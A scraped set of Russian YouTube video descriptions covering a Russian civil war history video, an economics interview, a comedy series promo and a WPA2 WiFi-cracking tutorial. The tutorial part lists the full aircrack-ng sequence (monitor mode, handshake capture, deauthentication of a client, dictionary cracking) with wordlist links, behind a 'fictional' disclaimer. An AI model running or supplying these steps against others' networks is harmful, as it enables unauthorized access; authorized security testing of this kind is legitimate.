Россия после после февральской революции и в особенности после прихода к власти большевиков погрузилась в неуправляемый хаос. Сегодня речь пойдет о гражданской войне в России.
Некоторые историки говорят даже о нескольких гражданских войнах в России одновременно, поэтому обсудим все эти войны по отдельности.
00:00 ИНТРО
00:53 КРАСНЫЕ ПРОТИВ БЕЛЫХ
10:22 КРАСНЫЕ ПРОТИВ УКРАИНЫ
14:25 НАСТУПЛЕНИЕ БЕЛЫХ НА МОСКВУ
15:35 ЗЕЛЕНЫЕ ПРОТИВ БЕЛЫХ
18:22 ОТСТУПЛЕНИЕ БЕЛЫХ
20:06 КРАСНЫЕ ПРОТИВ ПОЛЬШИ
23:06 ИНОСТРАННАЯ ИНТЕРВЕНЦИЯ
27:24 КРАСНЫЕ ПРОТИВ КРАСНЫХ
30:21 ТЕРРОР
33:47 КРАСНЫЕ ПРОТИВ ВРАНГЕЛЯ
35:03 КТО ПОБЕДИЛ?
Наша группа ВКонтакте, которая обновляется каждый день: vk.com/gamesbusters
Свежие новости, скидки на игры, пополняемые альбомы и чат на стене! Вступай!
Сергей Гуриев — большой экономист, который в 2013 году был вынужден уехать из России. В этом видео — разговор про экономику и политику на максимально простом языке.
Что будет с Россией, когда закончится нефть?
Правда ли, что доллару скоро конец?
У США — огромный внешний долг. Почему тогда их экономика все равно в порядке?
Почему Путин все-таки решился на пенсионную реформу?
Что будет с Россией через 10 лет?
Друзья, в декабре у нас для вас ПРЕМЬЕРА! Мы покажем вам сериал с Гариком Харламовым — «Зона Комфорта».
Герой Гарика — Ярослав Костров по стечению обстоятельств попадает в норвежскую тюрьму, условия в которой соответствуют уровню хорошей российской гостиницы. Проблемы с женой, детьми, родителями, любовницами и мафией! Всё это ему придётся решать с помощью скайпа.
Генеральный спонсор — Сергей Гришин.
В главной роли — Гарик Харламов.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…